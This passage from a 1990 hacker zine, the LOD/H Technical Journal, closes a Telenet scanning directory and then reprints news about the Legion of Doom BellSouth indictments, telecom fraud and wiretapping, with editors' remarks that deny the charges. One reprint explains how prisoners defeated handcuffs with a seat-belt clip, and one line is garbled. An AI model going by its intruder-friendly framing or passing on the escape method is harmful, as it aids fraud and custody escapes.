still a vast amount of systems out there. One address I have responds with
rejecting until you connect to the sub address 74! Imagine trying to go
that far on each of the thousands of rejecting and illegal addresses I
obtained in my scanning! Maybe some other time.

There are several areas that I scanned that are not in this directory.
Mainly, these are areas where I didn't find anything. So you don't waste
your time, all hosts in Canada are served through Datapac, so there is
nothing in areas prefixed with a Canadian area code. There are also many
US areas that I guess are still striving for the Industrial Revolution, and
therefore have no systems online. There are also several privately owned
prefixes that I didn't scan just because it would be a pain in the ass,
above and beyond the pain involved doing the main scanning. The major ones
are 622 (NYNEX), 891, 892, 893, & 894 (OWNERS UNKNOWN). There are also a
few others that go up and down daily, depending upon their mood. I
wouldn't suggest that you all immediately start hacking these prefixes;
mainly because you will need an ID just to get a response other than
refused collect connection.

Lastly, if anyone finds any errors in the directory, or finds anything I
omitted, let me know, and I'll revise it. Also, if anyone would like a
copy of the telix script I used to do this scanning, let me know. This was
a bitch to do, but I think it was worth the trouble. The next update won't
be for a year, as this should suffice for at least that long.


==============================================================================
End of Second Half of LOD/H Telenet Directory, Rev. #5
==============================================================================
The LOD/H Technical Journal, Issue #4: File 10 of 10.



NETWORK NEWS AND NOTES
----------------------


The Network News and Notes file contains reprints of articles that are of
interest to the majority of our intended readers. In this installment we
borrowed heavily from the CFCA (Communications Fraud Control Association)
Communicator since the newsletter deals specifically with issues relevant to
our readers. The CFCA is "a nonprofit educational organization founded in
1985 to help the telecommunications industry combat fraud."

Overall, do not let the titles mislead you. Every article contains interesting
and we hope useful information. Be sure to take the time and read into them
before skipping. Some are a little old but better late than never. If anyone
comes across any articles of interest, we would like to know about them. One
more note, all comments within brackets [], are remarks made by one of
the TJ editors.

The first two articles, as was stated in the Introduction, relate the various
trouble some noted members of the community ran into.

______________________________________________________________________________


Source: The Wall Street Journal
Issue: Wednesday, February 7, 1990
Title: Computer Hackers Accused of Scheme Against BellSouth
Author: Thomas M. Burton


CHICAGO--Federal grand juries in Chicago and Atlanta indicted four computer
hackers in an alleged fraud scheme that authorities said could potentially
disrupt emergency "911" telephone service throughout nine Southern States.

The men, alleged to be part of a closely knit cadre of computer hackers
known as the Legion of Doom, gained access to the computer system, controlling
telephone emergency service of BellSouth Corp., the Atlanta-based
telecommunications giant.

BellSouth, through two subsidiaries, oversees phone service in Alabama,
Mississippi, Georgia, Tennessee, Kentucky, Louisiana, Florida, and the
Carolinas.

The Chicago indictment said members of the Legion of Doom are engaged in
disrupting telephone service by entering a telephone company's computers and
changing the routing of telephone calls. The hackers in the group also
fraudulently obtain money from companies by altering information in their
computers, the indictment said.


The hackers transferred stolen telephone-computer information from
BellSouth to what prosecutors termed a "computer bulletin board system"
in Lockport, Ill. In turn, the men planned to publish the computer data in a
hackers' magazine, the grand jury charged.

-----EDITOR'S NOTES:
As always, ignorance and falsehoods are abound in most articles of this
nature. For the record, NO TELEPHONE SERVICE WAS INTENTIONALLY DISRUPTED DUE
TO THE ACCUSED MEMBERS. Furthermore, NO MONEY FROM COMPANIES WAS EVER
FRAUDULENTLY OBTAINED BY ALTERING INFORMATION IN THEIR COMPUTERS. These are
the typical WILD accusations made by law enforcement and further distorted
by the media in such cases. As for the bbs is Lockport, Ill. well it was
simply a legitimate information storage and retrieval system used by many,
many people for legitimate purposes of information exchange. It would be very
time consuming for the operator of said system to check every file on the
system as it was a UNIX based system with a lot of disk space. The hacker
magazine stated above is simply Phrack, Inc. put out by Knight Lightning and
Taran King. More comments after next article.


_____________________________________________________________________________

Source: ComputerWorld
Issue: 1990
Title: Babes in high tech toyland nabbed
Author: Michael Alexander

CHICAGO--- The U.S. Justice Department escalated its ware against computer
crime last week with two indictments against members of an alleged computer
hacker group, who are charged with stealing a copy of a 911 emergency computer
program from BellSouth Telephone Co., among several other crimes.

In a seven-count indictment returned in Chicago, Robert X, 20 also known as
"The Prophet", is alleged to have used a computer to steal a copy of a
computer program owned and used by BellSouth that controls emergency calls to
the police, fire, ambulance and emergency services in cities throughout nine
Southern states. According to the indictment, after X stole the program --
valued at $79,449 -- he uploaded it to a computer bulletin board.

The Chicago indictment further alleges that Craig Y, 19, also known as
"Knight Lightning" downloaded the 911 program to his computer at the
University of Missouri in Columbia, Mo., and edited it for publication in
"Phrack", a newsletter for computer hackers.

X and Y allegedly intended to disclose the stolen information to other
computer hackers so that they could unlawfully access and perhaps disrupt
other 911 services, the Chicago indictment charged.

In a second indictment returned in Atlanta, X and two others were charged
with additional crimes related to BellSouth systems.

All four hackers allegedly are members of the Legion of Doom, described in
the indictments "as a closely knit group of about 15 computer hackers", in
Georgia, Texas, Michigan and several other states.

BellSouth spokesmen refused to say when or how the intrusion was detected
or how a computer hacker was able to lift the highly sensitive and proprietary
computer program.

"Hopefully, the government's action underscores that we do not intend to
view this as the work of a mischievous prankster playing in a high-tech
toyland", one spokesman said.

A source within BellSouth said that much of what the hacker took was
documentation and not source code. "They did not disrupt any emergency
telephone service, and we are not aware of any impact on our customers", the
source said.

William Cook, an assistant U.S. attorney in Chicago, declined to comment on
whether 911 service was actually disrupted. "It is a matter of evidence,", he
said.

Cook also said that while the two hackers are charged with carrying out
their scheme between December 1988 and February 1989, the indictment came
after a year-long investigation. Though Cook refused to say how the hackers
were discovered or caught, it is believed that after the initial penetration
by one of the hackers, an intrusion task force was set up to monitor
subsequent security breaches and to gather evidence against the hackers.

If convicted on all counts, X faces a prison sentence of up to 32 years and
a maximum fine of $222,000, and Y faces a prison sentence of 31 years and a
maximum fine of $122,000.

The Atlanta indictment charged Robert X, Adam Z, 22 known as "The Urvile"
and also "Necron 99", and Frank XYZ, 23 known as "The Leftist", with eight
counts each of computer fraud, wire fraud, access code fraud and interstate
transportation of stolen property, among other crimes.

If convicted, each defendant faces up to five years imprisonment and a
$250,000 fine on each count. The three illegally accessed Bellsouth computers
and obtained proprietary information that they distributed to other hackers,
the indictment alleged.

----EDITOR's NOTES: As is confirmed in this article, no telephone service
was disrupted. The extent of BellSouth's inadequacy regarding security matters
was not detailed in these articles. Here is a rundown of what may have
possibly happened: BellSouth's SBDN (Southern Bell Data Network) which is a
modified Telenet network that contains hundreds if not thousands of network
nodes (individual systems) may have been accessed during which time the system
that controls the entire network may have been possibly compromised. This
would allow someone to access just about any system on the network, since
Bellsouth consolidated most of their individual systems onto a large network
(economically not a bad idea, but a security nightmare indeed). This may allow
one to stumble onto systems dealing with 911. Since it may be interesting to
learn how such a system operates and how the 'automatic trace' is
accomplished, the documentation would be of some help. No need for any actual
programs however. Possibly, maybe, an article paraphrased the operation of 911
and was possibly to be distributed through the Phrack, Inc. newsletter.

The last names of those involved were omitted. Go look them up for yourself if
you think its that important.

Just for the record: KNIGHT LIGHTNING NEVER WAS A MEMBER OF LOD. Yet another
error in the reporting...LOD has half the 15 supposed number of members.

Another article followed the above one on the same page, by the same author:

Last week's disclosure of an alleged hacker theft of highly sensitive
BellSouth Telephone Co. documentation for a nine-state 911 emergency system
was the second serious security breach of a telephone company network to come
to light in as many months.

In January, a trio of hackers was able to penetrate computer systems at
Pacific Bell Telephone Co. and eavesdrop on conversations and perpetrate other
criminal acts. [CW, Jan. 22].

Just how vulnerable are the nation's telephone systems to hacker attacks?
Spokesmen for BellSouth and Pacific Bell insist that their systems are secure
and that they and other telephone companies routinely assess their
vulnerability to hackers.

"Security is being constantly changed, every intrusion is studied,
passwords are changed," said Terry Johnson, manager of media relations for
BellSouth in Atlanta.

Johnson however, declined to say how the hackers allegedly were able to
lift the documentation to a 911 emergency communication services program.

"It is a rather serious computer security breach," said Richard Ichikawa, a
Honolulu based telecommunications consultant who specializes in designing and
installing 911 emergency systems. Stealing documentation, as the Legion of
Doom member is alleged to have done, many not be a particularly difficult task
for a savvy hacker, he said.

Taking the actual program, while certainly possible, would be much more
challenging, however. The computer the controls enhanced 911 service is "quite
isolated" from the calling public, Ichikawa said.

A recently published report to Congress by the Office of Technology
Assessment suggested that the security and survivability of the nation's
communication infrastructure is at greater risk to hacker attacks than ever
before. Business and government reliance on communications and information
based systems has increased, thus much more is at stake when those systems
fail, the report stated.

The increased publicity of hacker attacks may help to curb attacks by
hackers, said Sanford Sherizen, a security consultant at Data Security
Systems, Inc., in Natick, Mass.

Some law enforcement officials complain that the nation's telephone firms
do not cooperate as readily as they would expect when attacks of this sort
occur. "They [telecommunications providers] are the single biggest headache
law enforcers have right now," said Gail Thackery, Arizona stat assistant
district attorney.

Regional Bell operating companies contacted last week disputed that
assertion.

_____________________________________________________________________________

Source: CFCA (Communications Fraud Control Association) Communicator
Issue: February-March 1989
Title: But are LD networks safe?

Spread over vast distances and segmented by switches guarded by their own
passwords, long distance networks are generally safe from virus attacks.
According to Henry Kluepfel, Bellcore district manager of Security Planning
intruders can easily attain the same information that is available to vendors
and service providers. "If passwords are not changed regularly, intruders
can quickly wreak havoc".

Scott Jarus, division director of Network Loss Prevention for Metromedia,
and a member of CFCA's Board of Directors, says that users of "outboard"
computer systems should not be assigned high level access to their company's
switches or networks. "Non-proprietary hardware and software that handle
such functions as billing collection and network database management are
targets for unauthorized access and viruses", he says.

Mr. Kluepfel says that once hackers have the documentation they can send
details on how to crash the systems to hundreds of bulletin boards. "We
found that many system administrators didn't realize manufacturers install
rudimentary default passwords."

Bellcore encourages using sophisticated codes and applying a variety of
defenses. "Don't simply rely on a dialback modem, or a good password", says
Mr. Kluepfel. "Above all, don't depend on a system to always perform as
expected. And remember that new employees don't know the administrative
measures the operator knows".

Managers should advise clients on any needed internal analysis and
investigations, and keep abreast of technological advances when planning
their defenses.

_____________________________________________________________________________


Source: Same as above
Title: Secure those gray boxes

After the FCC mandated that telcos provide test modes on the gray
[or green (ed. note)] connection boxes usually found outside structures,
there have been instances of persons surreptitiously clipping on handsets
or snapping in modular connections (RJ-11) to make long distance calls on the
residents' line. CFCA advises customers to padlock their boxes to deter such
thievery.

John Venn, manger of Electronic Operations at PacBell's San Francisco
office, reports that the boxes they install have separate connections for
company and customer use, so that users have the option of securing access
to their portion. PacBell's side has a built-in lock, while customers have
padlock hasps.

_____________________________________________________________________________


Source: Same as above
Title: Product Description: Pen-Link analysis software
Author: Mike Murman

Since 1986, Pen-Link, Ltd. of Lincoln Neb. has been producing software
that supports telecom investigations. Last July, the company introduced an
updated version of Pen-Link, a two-year-old program that accepts data from
most Dialed Number Recorders (DNRs) manufactured today, pools that information
into a common database structure, and allows the user to determine the calling
patterns and the codes that have been compromised.

In today's ever-expanding telecommunications environment there is a need
for faster identification and documentation of abuser call patterns to assure
successful prosecutions. In applications of DNRs for investigative purposes,
Pen-Link programs have reduced the time normally needed to input, analyze and
report call data by as much as 90 percent. The result is improved productivity
and quicker response to customers' needs.

The Pen-Link 2.0 program also provides several related features. First, it
is a communications program, meaning that if you are using a DNR with modem
capability or RS232 communication ports, the program can automatically load
your call records into a PC, eliminating the time needed to key-in call
record data.

Second, Pen-Link has an autoload format section that takes call records
you have transferred and puts them into a standard record format. This is an
important feature, given that the program supports multiple types of DNR
hardware that all have unique call data formats.

In short, you can use any combination of DNRs in your investigations with
Pen-Link and all data will be compatible. Furthermore, the program allows
you the flexibility of purchasing new DNRs of any type, and not worry about
duplicating your software expense or learning new software programs. [Notice
how he keeps saying "you" in this article? (ed.)]

Finally, Pen-Link enables you to analyze and report on your call record
information. There are 15 different call analysis reports and 6 different
graphic reports. If these reports do not meet your needs, the program has a
report generator that allows you to customize your analysis and reports.

Pen-Link is a dedicated program written in Turbo Pascal. The company
elected to start from scratch and develop its own software, rather than
simply adapting standard applications. There are two reasons for this
approach: dedicated software programs run more efficiently, so that if a
hacker is generating thousands of call records and you want to analyze and
report this information, the program can provide a report much faster than if
you were processing the data manually.

The second reason behind this strategy is that users only need to learn
and understand the options for the pop-up menu format. Pen-Link also supports
color monitors.

A manual editing feature allows you to enter your database and find
specific records by the criteria you have selected; then review and edit the
data. Manual editing also allows you to enter call data from old pen
registers that only produce paper strips containing call information.

Another feature, the utilities section, provides several options to
manage call information stored in your computer. This allows you to archive
information to disk, then reload it later when it is needed. If your data
files become corrupted, you can reconstruct and reformat them by using the
utilities section. And if you wish to use your call data information in
another application program, Pen-Link's utilities allow you to create an
ASCII text file of call information, which then can be read by these programs.
Furthermore, the program can accept ASCII text files from other DNR software
programs.

The program calls for an IBM or compatible PC equipped with a hard drive,
operating under MS-DOS 2.1 or higher. Pen-Link currently supports the
following DNRs: JSI, Mitel, Racom, Voice ID, Hekimian, Bartec, Pamco, HDS,
and Positive Controls. If you are using a DNR that is not listed, Pen-Link,
LTD will program its software so it can automatically load call records from
your equipment.

The use of DNRs that automatically transfer call record data saves your
security department considerable investigative time. Pen-Link's mission is
to provide telcom security departments with a sophisticated investigative
software tool that is easy to use, flexible and compatible.

_____________________________________________________________________________

Source: Same as above
Title: Extended Ky. case resolved

A 21 year-old Kentucky man was successfully convicted October 27 on 14
counts of computer and toll fraud under a number of state statutes. The
defendant, John K. Detherage, pleaded guilty to using his personal computer to
identify authorization codes in order to place unauthorized long distance
calls valued at $27,000.

Detherage had been indicted a year earlier by an Oldham County grand jury
on six felony counts related to the scam and two misdemeanor counts of
possessing stolen personal identification and calling card numbers. He was
later charged with two additional counts of possessing stolen PINs.

Detherage originally was to have been tried in February 1988, but the case
was postponed when he pleaded guilty. He was sentenced at the Oldham County
Circuit Court at LaGrange to pay $12,000 in restitution, and relinquish all
computer equipment and software to the court.

His charges included theft of services over $100; theft of services; four
counts of unlawful access to a computer, second degree; possession of stolen
credit or debit cards, and six counts of unlawful access to a computer. Four
other counts were dismissed.

Kentucky has a number of statutes that can be applied to theft of telephone
services. Chapter 514.060 addresses theft of services, while 514.065 describes
the possession, use or transfer of a device for the theft of services. Theft
of services is defined to include telephone service, and the defendant was
charged with two counts under 514.060.

Detherage was also charged with 10 counts (six felony and four misdemeanor)
under Chapter 434.580, which relates to the receipt of stolen credit cards.
Kentucky interprets computer crime as involving accessing of computer systems
to obtain money, property or services through false or fraudulent pretenses,
representations or promises.

_____________________________________________________________________________


Source: Same as above
Title: Industry Overview

As major players in the telecom industry shore up the defenses on their
telephone and computer networks, criminals [who, us?] are turning to smaller,
less protected companies [its called survival of the fittest]. In 1988, the
use of stolen access codes to make free long distance calls continued to be
the favorite modus operandi among network intruders throughout the industry,
although code abuse leveled off or declined among large carriers with well
funded security organizations and substantial technical apparatus to defeat
most toll and network fraud.

However, some resellers and PBX owners are being victimized by fraud of all
types, probably because most use access codes with only six or seven digits.
Such vulnerable systems will continue to be used by abusers to route long
distance calls overseas. Fraudulent calls placed on a compromised system
quickly accumulate charges the system owner must eventually pay.

Many PBX's also lack effective systems able to detect irregular activities
and block fraudulent calls. Add to this the fact that several carriers may be
handling the inbound and outbound WATS lines, and investigator's jobs can
really become complex.

The sharp increase in the abuse of voice store-and-forward systems, or
voice mail, that began alarming owners and manufacturers early last year will
continue through 1989. Last spring, traffickers began seizing private voice
mail systems to coordinate drug shipments. Messages can be quickly erased when
they are no longer needed. Dealers have been receiving mailbox numbers by
pager, then calling in recorded messages from public telephones.

No matter how long a security code may be, if intruders obtain an 800
number to a voice mail system they can program a computer and take the time to
break it, because it won't cost them anything. Once accessed through a PBX,
intruders can exchange stolen lists of long distance access codes, usually
without the system owner's knowledge.

The time it takes abusers to break into a voice mail system is
proportionate to the number of digits in a security code. A four-digit code
can, for example be beaten by a skilled computer operator in slightly over a
minute. [Clarification, this is probably through the use of default security
codes, not sequential or random scanning techniques. ed.] One problem is that
voice mail customers don't often know what features to select when buying a
system. And few manufactures take the initiative to advise customers of the
importance of security.

Another problem that has been around for several years, subscription fraud,
will continue into 1989, although telcos have reduced it by making customer's
applications more detailed and comprehensive [like requiring customers to
supply their credit card numbers. This way if they skip town without paying
and the credit card is valid and not maxed out, the phone company can still
recover the money owned them. ed.], and by checking out potential customers
more thoroughly. Dishonest subscribers use false identification and credit
references to obtain calling cards and services, with no intention of paying.

Intelligent software is available that aids switch and PBX owners in
identifying, screening and blocking fraudulent calls. Another precaution is
to add digits to access codes, because numbers of fewer than 10 digits cannot
withstand today's intruders. A number of carriers have already gone to 14
digits.

Some larger carriers have been sending technical representative out to
reprogram PBX's, encourage customers to install better safeguards, and advise
them to shut down their systems at night and on weekends. Customers should
also expect to see billing inserts warning of the improved defenses against
fraud.

As more companies break into the international market they will need solid
security safeguards to protect them against intrusions of their networks. A
small interexchange carrier (IC) in Alabama was hit hard recently by "phone
phreakers" soon after they opened overseas service.

Other start-ups find themselves desperately trying to play catch up after
blithely operating several years without a hitch. An IC with 30,000 customers
in Southern California increased its seven-digit access codes to ten digits
and it aggressively pursuing five groups of hackers its investigators
uncovered after discovering that company-issued personal identification
numbers were posted on computer bulletin boards.

In the final analysis, one fact emerges: widespread cooperation among
injured parties will ensure quicker results and conserve vital company
resources.

_____________________________________________________________________________


Source: PC Week April 10,1989
Title: Keep an Ear Out for New Voice Technology
Author: Matt Kramer

With the rise in digital transmission of voice and data, it's easy to
assume that voice and data have merged into a muddle of indiscriminate
material, with voice indistinguishable from data. After all, a bit's a bit,
right?

But, those people in the white lab coats keep coming up with new ways to
use voice technology.

The telephone companies are the ones poised to make the most of this
technology. U.S. Sprint recently announced that it was experimenting with the
use of "voice prints"--a recording of a verbal password that would be used to
help identify authorized subscribers using their U.S. Sprint telephone charge
cards, which would help cut down on hackers trying to steal telephone service.
Subscribers would record a voice print of a verbal password. Then, when they
were using their charge cards, they would repeat the passwords to verify their
identities.

Northern Telecom has embarked on its own efforts to bring voice-recognition
technology to public telephone service. it is selling telephone companies a
new billing service that uses voice-recognition technology to automate collect
and third-number billing calls.

Called the Automated Alternate Billing Service (AABS), the system calls the
party to be billed and "asks" if the charges will be accepted. The Northern
Telecom switch "listens" to the response and either completes the call or
informs the calling party that the charges have been refused.

Northern Telecom also plans to use voice technology to offer other
features, such as allowing the system to announce the caller's name in the
party's own voice and stating the call's origin, such as the name of a city,
a university or an institution.

The big draw for phone companies, of course, is reduction of personnel
costs, since no human operator assistance is needed. That's an option for lots
of corporate financial officers who have been attracted to automated-attendant
phone systems because they can replace a bevy of switchboard operators.

What would be interesting about the Northern Telecom technology is to see
if it can be expanded to other gear, such as private branch exchanges, and if
if can beef up the automated-attendant feature. Rather than require callers
to punch a lot of buttons to get in touch with someone, perhaps voice
recognition could be used to "listen" for a name and then direct the call to
the appropriate party. That would be especially useful in situations where you
don't know the exact extension of whomever you are calling. Trying to maneuver
around an on-line telephone directory can be a real pain in the neck.

At the same time, voice-recognition technology can be paired with voice
mail so that users can access their voice mailboxes without having to punch in
an identification number or password or to deal with a menu. It would be a lot
easier to just say, "Read messages".

There's still a lot of potential to be developed in voice technology.

_____________________________________________________________________________


Source: PC WEEK May 15, 1989
Title: MCI to Provide Transition to ISDN
Author: Matt Kramer

MCI Communications Inc. hopes to give its customers a smoother transition
to ISDN with new services that offer many of the technology's features without
requiring costly upgrades to ISDN-compatible equipment.

The communications company recently announced new Integrated Services
Digital Network and "ISDN-equivalent" services that will provide MCI customers
with network-configuration, control and management features, according to
company officials.

The equivalent services, which will be available this fall, run over
existing in-band signaling channels. True ISDN services require a separate
out-of-band D channel for signalling.

MCI's full ISDN services are scheduled for delivery in the first quarter of
next year.

The equivalent services, while not providing the full ISDN feature set, are
designed to introduce customers to the benefits of ISDN before requiring them
to make the investment in ISDN-compatible telecommunications gear, officials
said.

"While they may not want to make that expenditure now, they certainly want
to have ISDN-like services available", said Kevin Sharer, senior vice
president of sales and marketing at MCI, in Washington.

The equivalent products include the MCI 800 Enhanced Services Package,
which allows customers with dedicated access lines to receive the number of
the calling party just prior to receiving the call. This Automatic Number
Identification (ANI) is then used to query a database to bring up a customer's
account or other information, according to officials.

Northern Telecom Inc. and Rockwell International Corp. have developed new
software for their private branch exchanges that permits the switches to
handle in-band ANI transmission.

Some observers expect the equivalent services will be useful in the
evolution from existing telecommunications to ISDN. "If all you need is ANI,
then the equivalent services might be just what you want", said Claude Stone,
vice president of product development at the First National Bank of Chicago
and vice chairman of the national ISDN Users Forum.

_____________________________________________________________________________

Source: A newspaper
Date: Sometime in June
Title: Sheriff's prisoners find handcuffs are a snap to get out of
Author: unknown

Ten jail prisoners who discovered an ingenious way to escape from handcuffs
are sending alarms across the nation. Emergency bulletins will be sent to law
enforcement agencies via teletype machines nationwide. On Friday, deputies
were taking 10 prisoners from the jail downtown to another one in the city.
All were handcuffed. "When the deputy opened the back of the van, all 10 guys
were smiling and said, 'See what we did,'" the Sheriff said. Each prisoner
held up his arms to show broken handcuffs.

The culprit was a simple seat belt clip. The circular cuffs are connected
with a chain, held tightly to each cuff by a swivel-head link that moves
freely to ensure that the chain cannot be twisted when the wrists move. Seat
belt clips typically have one or two holes, or slots, that lock them into
place with the buckle. The prisoners learned that jamming the swivel-head on
the clip stops the swivel head from turning freely. "A quick twist of the
wrist, and the chain shears off at the cuff," the sheriff said.

The sheriff ordered seat belts removed from jail vans. He also ordered
that the prisoners in cruisers be handcuffed with their hands behind their
back and the seat belts locked firmly across them. Deputies often handcuffed
prisoners' hands in front of their bodies. But even if prisoners were cuffed
behind their backs, it would not be difficult for them to manipulate the
swivel head into a seat belt buckle and twist themselves free -- if they
could reach the seat belt. "This is a danger to every law enforcement officer
in the country", the sheriff said.

Handcuff manufacturers contacted Friday are studying the possibility of
redesigning the handcuffs by enlarging the swivel head or placing some type
of shroud over it. "People in jail have 24 hours a day to figure a way out"
said the sheriff.

"Although only 10 people know the technique, I guarantee that the entire
jail population will know how to do it before the day is up,". "The only
people who won't know about it is law enforcement officers". The sheriff
met Friday with representatives of several local and federal agencies. An
FBI spokesman said the escape technique will be described in the FBI's
nationally distributed LAW ENFORCEMENT BULLETIN.

Although the sheriff was grateful to learn about the technique from
prisoners who did not try to escape, he was not amused. He told deputies,
"Charge them with destruction of county property. We'll see how funny they
think that is."

_____________________________________________________________________________

Title: Federal grand jury probes Cincinnati Bell wiretapping flap
Source: Data Communications
Issue: November 1988
Author: John Bush

A federal grand jury in Ohio is investigating illegal wiretapping
allegations involving two former employees of Cincinnati Bell who claim the
telephone company ordered them for more than a decade to eavesdrop on
customers.

In addition, an attorney who filed a class-action lawsuit against
Cincinnati Bell on behalf of the people and companies who were allegedly
wiretapped, says he is trying to prove that the telephone company sold the
information gained from the electronic surveillance.

A Cincinnati Bell spokesperson denied the charges, saying they were
trumped-up by the two former employees, who are seeking revenge after being
fired by the telephone company.

The lawsuit has been filed against Cincinnati Bell Inc. on behalf of
Harold Mills, a former police lieutenant and former commander of the
Cincinnati Vice Squad, as well as a number of other individuals and companies.
Among the alleged victims mentioned in the complaint were Sen. Howard
Metzenbaum (D-Ohio) and Proctor and Gamble Co. (Cincinnati, Ohio).

Gene Mesh, the attorney who filed the lawsuit, believes the Cincinnati Bell
case is not an isolated incident but a trend...an explosion o

  
f cancer that
"this kind of thing [wiretapping] has developed its own markets."

When asked if Cincinnati Bell was selling the information gained from
tapping, Mesh said "we are proceeding along evidentiary lines to prove this."

Thus far, the civil action hinges on the testimony of two former Cincinnati
Bell employees, Leonard Gates, a supervisor, and Robert Draise, an installer
who at one time worked for Gates. Their combined testimony states that, under
the auspices of Cincinnati Bell, they conducted over 1,200 illegal wiretaps
from 1972 to the present.

According to Gates, as a result of the Proctor and Gamble wiretap, "we
were into all of P&G's databases." In addition, both Gates and Draise claim
to have been in on illegal wiretaps of General Electric Co.'s Aircraft Engines
Division near Cincinnati. Draise also claims that he was ordered to identify
all of GE's facsimile and modem lines for Cincinnati Bell.

Neither Proctor and Gamble nor General Electric would comment. However
Sen. Howard Metzenbaum's Washington, D.D., office says that the Senator
"found the news shocking and is awaiting more information to see if it
[the wiretap] actually happened.

Meanwhile Cincinnati Bell maintains that the suit and allegations are
merely Gates's and Draise's way of getting back at the phone company for
having fired them.

Cyndy Cantoni, a spokesperson for Cincinnati Bell, said that "we have heard
the allegations that we wiretapped, but if Draise or Gates did any tapping, it
wasn't done at Cincinnati Bell's request."

Cantoni also cited a letter from Cincinnati Bell President Ray Clark that
went out to all Cincinnati Bell employees in the wake of the publicity
surrounding the wiretapping accusations. The letter stated that Gates had been
warned in April 1985 against continuing an affair with an employee he had been
supervising and who had accused him [Gates] of sexual harassment, according to
Cantoni.

The letter went on to say that Gates reacted to the warning with
insubordination and threats and "carried on a campaign against the company."
As a result, Gates was fired for insubordination, says Cantoni. Robert Draise
was fired after he was convicted of misdemeanor wiretapping charges for
tapping the phone line of a friend's girlfriend, Cantoni says.

Cincinnati Bell is an independent telephone company that was allowed to
keep the "Bell" trademark after divestiture, since it is older than AT&T,
says Cantoni.

[ End of Document ]
[ End Of The LOD/H Technical Journal Issue #4 ]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT